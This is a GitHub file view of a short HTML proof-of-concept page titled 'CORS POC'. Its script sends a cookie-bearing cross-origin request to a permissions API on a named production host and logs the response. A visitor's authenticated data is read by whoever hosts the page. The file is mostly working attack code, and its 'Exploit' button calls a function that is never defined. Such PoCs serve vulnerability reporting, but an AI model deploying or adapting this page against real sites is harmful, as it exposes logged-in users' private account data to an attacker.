-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
41 lines (38 loc) · 989 Bytes
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>CORS</title>
</head>
<body>
<center>
<h1>CORS POC</h1>
<br />
<br />
<p>Your Website Is Vulnerable To CORS Misconfugration</p>
<hr />
<button onclick="exploit()">Exploit</button>
</center>
<br />
<hr />
<div id="demo"></div>
<script>
var xhr = new XMLHttpRequest();
var url = 'https://frontegg-prod.au.vuln.com//identity/resources/permissions/v1';
xhr.open('GET', url, true);
xhr.withCredentials = true; // Send cookies
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE) {
if(xhr.status === 200) {
console.log(xhr.responseText);
} else {
console.error('There was a problem with the request.');
}
}
};
xhr.send();
</script>
</body>
</html>